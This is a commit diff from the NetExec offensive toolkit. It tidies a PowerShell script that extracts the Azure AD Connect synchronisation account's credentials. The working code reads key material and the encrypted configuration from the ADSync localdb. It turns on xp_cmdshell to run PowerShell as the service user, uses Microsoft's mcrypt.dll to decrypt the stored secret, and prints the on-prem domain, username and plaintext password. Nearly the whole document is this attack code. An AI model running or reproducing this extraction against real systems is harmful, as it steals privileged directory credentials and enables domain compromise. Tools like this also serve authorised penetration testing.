Skip to content

Commit 23bee81

Browse files
NeffIsBackNeffIsBack
committed
Remove unnecessary host info and formatting
1 parent 8415e25 commit 23bee81

1 file changed

Lines changed: 10 additions & 14 deletions

File tree

nxc/data/entry-sync-creds/entry-sync-creds.ps1

Lines changed: 10 additions & 14 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,5 @@
1-
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
2-
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
3-
1+
# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
2+
# Modified by @NeffIsBack
43
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
54

65
try {
@@ -10,8 +9,6 @@ try {
109
return
1110
}
1211

13-
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
14-
1512
$cmd = $client.CreateCommand()
1613
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
1714
$reader = $cmd.ExecuteReader()
@@ -25,8 +22,6 @@ $instance_id = $reader.GetGuid(1)
2522
$entropy = $reader.GetGuid(2)
2623
$reader.Close()
2724

28-
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
29-
3025
$cmd = $client.CreateCommand()
3126
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
3227
$reader = $cmd.ExecuteReader()
@@ -39,10 +34,12 @@ $config = $reader.GetString(0)
3934
$crypted = $reader.GetString(1)
4035
$reader.Close()
4136

42-
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
37+
$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
4338

4439
$cmd = $client.CreateCommand()
45-
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
40+
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
41+
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
42+
EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
4643
$reader = $cmd.ExecuteReader()
4744

4845
$decrypted = [string]::Empty
@@ -60,8 +57,7 @@ $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-do
6057
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
6158
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
6259

63-
Write-Host "[*] Credentials incoming...`n"
64-
65-
Write-Host "Domain: $($domain.Domain)"
66-
Write-Host "Username: $($username.Username)"
67-
Write-Host "Password: $($password.Password)"
60+
Write-Host "[*] Credentials incoming..."
61+
Write-Host "On-prem Domain: $($domain.Domain)"
62+
Write-Host "On-prem Username: $($username.Username)"
63+
Write-Host "On-prem Password: $($password.Password)"

0 commit comments

Comments
 (0)